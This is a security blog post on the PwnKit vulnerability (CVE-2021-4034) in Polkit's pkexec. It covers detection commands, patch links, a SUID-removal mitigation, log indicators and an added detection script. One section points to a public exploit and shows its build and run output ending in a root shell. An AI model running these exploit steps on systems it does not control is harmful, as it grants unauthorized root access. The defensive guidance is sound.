CVE-2021-4034 - gimme root

Hell yeah! Finally, a new category on 0ut3r Space! This is the first article in the vulnerability category. I’ve been planning this for some time. I will briefly describe the most spectacular, popular and interesting vulnerabilities from the perspective of blue and red teams, with some examples. Let’s start with the first one. Quite fresh.

pwnkit

CVE-2021-4034 was discovered by the Qualys Research Team. Why is it so special? Its origin has been tracked to the initial commit of pkexec, more than 12 years ago, so yeah, all Polkit versions are affected :) The good news is that the vulnerability is not remotely exploitable, but if you have access to the machine as any unprivileged user you can quickly and easily gain root privileges. One of the Zero Trust principles says: act as if the attacker is already inside. You can assume that some threat actors are already in your organization and were just waiting for a situation like this, to use this kind of vulnerability for privilege escalation. It has never been so easy, because Polkit (formerly PolicyKit) is a component installed by default in Linux distributions like Ubuntu, Debian, Fedora, and CentOS. Other Linux distributions are likely vulnerable too.

Check if you are affected

If polkit is not installed, you are safe. If it is, you are affected. Just check whether it is installed on your system.

On Debian based distros:

sudo apt list --installed | grep 'policykit\|polkit'

On RedHat based distros:

sudo rpm -qa | grep 'policykit\|polkit'

or

sudo yum list installed | grep 'policykit\|polkit'

On Suse:

sudo zypper search -i polkit

If you are a Linux admin, you know how to check it on your system.

Mitigations

Now the most important part. Mitigations! You have two options.

The first one is to patch it ASAP. Fortunately, patches are already published for most versions of the actively maintained Linux distributions.

You can check the security bulletins for your Linux version (each has a table with platform/release), for example:

RedHat - https://access.redhat.com/security/cve/CVE-2021-4034

Debian - https://security-tracker.debian.org/tracker/CVE-2021-4034

Ubuntu - https://ubuntu.com/security/CVE-2021-4034

SuSe - https://www.suse.com/security/cve/CVE-2021-4034.html

If there is no patch for your operating system, you have the second option: remove the SUID bit from pkexec as a temporary mitigation.

Check it:

$ ls -l /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 May 26 2021 /usr/bin/pkexec

Remove it:

sudo chmod 0755 /usr/bin/pkexec

But to be honest, if there is no patch for your operating system it probably means you should update your system to an actively developed one.

Attack! I mean POC

Davide Berardi published an exploit. In the next few days there will be more and more exploits for this.

For now, if you would like to test it, just download it from GitHub. Compile it with make and run ./cve-2021-4034.

Example:

vagrant@ubuntu-impish:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
vagrant@ubuntu-impish:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

Easy peasy ;)

Signs of exploitation

It is possible to exploit this without leaving a trace, but you can check the logs (auth.log) for:

The value for the SHELL variable was not found the /etc/shells file

or

The value for environment variable […] contains suspicious content.
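A small helper that ties the SUID check from the mitigation section to the two log messages above. This is an added example, not code from the original post or from Polkit; the pkexec path, the "pwnkit-sample-auth.log" file name and the log lines it writes are constructed sample data, not a real auth.log.

```shell
#!/bin/sh
# Added example (not from the original post).
# is_pkexec_suid: does the given pkexec binary still carry the setuid bit?
#   (the temporary mitigation above removes it with chmod 0755)
# count_pwnkit_indicators: how many lines in a log file carry one of the two
#   messages pkexec writes when it aborts on a bad SHELL or a suspicious variable.

# Prints "missing", "suid" or "not-suid" for the path given as $1.
is_pkexec_suid() {
    if [ ! -e "$1" ]; then
        echo missing
    elif [ -u "$1" ]; then
        echo suid
    else
        echo not-suid
    fi
}

# Prints the number of lines in $1 matching either pkexec indicator message.
count_pwnkit_indicators() {
    grep -c \
        -e 'The value for the SHELL variable was not found the /etc/shells file' \
        -e 'The value for environment variable .* contains suspicious content' \
        "$1"
}

# Constructed sample log (hypothetical hosts, PIDs and users) so the script runs offline.
SAMPLE_LOG="${TMPDIR:-/tmp}/pwnkit-sample-auth.log"
cat > "$SAMPLE_LOG" <<'EOF'
Jan 26 10:01:02 host sshd[1001]: Accepted publickey for vagrant from 10.0.2.2 port 50122 ssh2
Jan 26 10:01:40 host pkexec[1042]: vagrant: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/home/vagrant] [COMMAND=/usr/bin/id]
Jan 26 10:01:41 host pkexec[1043]: vagrant: The value for environment variable XAUTHORITY contains suspicious content [USER=root] [TTY=/dev/pts/0] [CWD=/home/vagrant] [COMMAND=/usr/bin/id]
Jan 26 10:02:00 host sudo:  vagrant : TTY=pts/0 ; PWD=/home/vagrant ; USER=root ; COMMAND=/usr/bin/apt update
EOF

# Report for the reader: real pkexec on this box, indicator count in the sample log.
printf 'pkexec setuid state: %s\n' "$(is_pkexec_suid /usr/bin/pkexec)"
printf 'indicator lines in sample log: %s\n' "$(count_pwnkit_indicators "$SAMPLE_LOG")"
```

Point count_pwnkit_indicators at /var/log/auth.log (or journalctl output piped to a file) to run the same hunt on a real host.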

Additional info

Fun facts. Or just facts.

You may wonder what the heck happened, since the CVE number says it is from last year. Yup! Qualys reported the security issue responsibly on November 18, 2021, but before they published the technical details, they waited for a patch.

Official polkit repo: https://gitlab.freedesktop.org/polkit/polkit

Why is the vulnerability named “PwnKit”?

It is a pun on the name of the vulnerable application, Polkit.

Another busy week for the SOC in many companies. I hope that one member of our Discord channel can finally rest on his rescheduled holiday. (Best regards, Liks) If not, just let those lazy IT admins patch their shit and go rest :D